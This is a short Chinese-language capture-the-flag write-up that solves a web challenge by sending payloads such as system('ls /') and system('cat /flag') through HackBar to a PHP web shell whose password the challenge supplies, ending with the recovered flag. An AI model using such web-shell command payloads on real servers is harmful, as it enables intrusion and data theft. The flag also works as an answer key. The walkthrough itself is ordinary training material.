这道题原本很简单的可以用蚁剑连接。但是我的蚁剑多多少少有点问题,所以我用hackbar解题,提供另外一种思路。如果你和我一样的话也可以用hackbar。
打开题目,发现直接给了我们连接密码
打开hackbar,先测试一下能否连接上
Syc=phpinfo();
先查看根目录。要记得查看源码,才能真正的回显出来。
Syc=system("ls /");
打开根目录下的flag文件。
Syc=system("cat /flag");
即可获得flag。
flag{742ac48f-cbf6-4c0a-a609-1b760bdee0f6}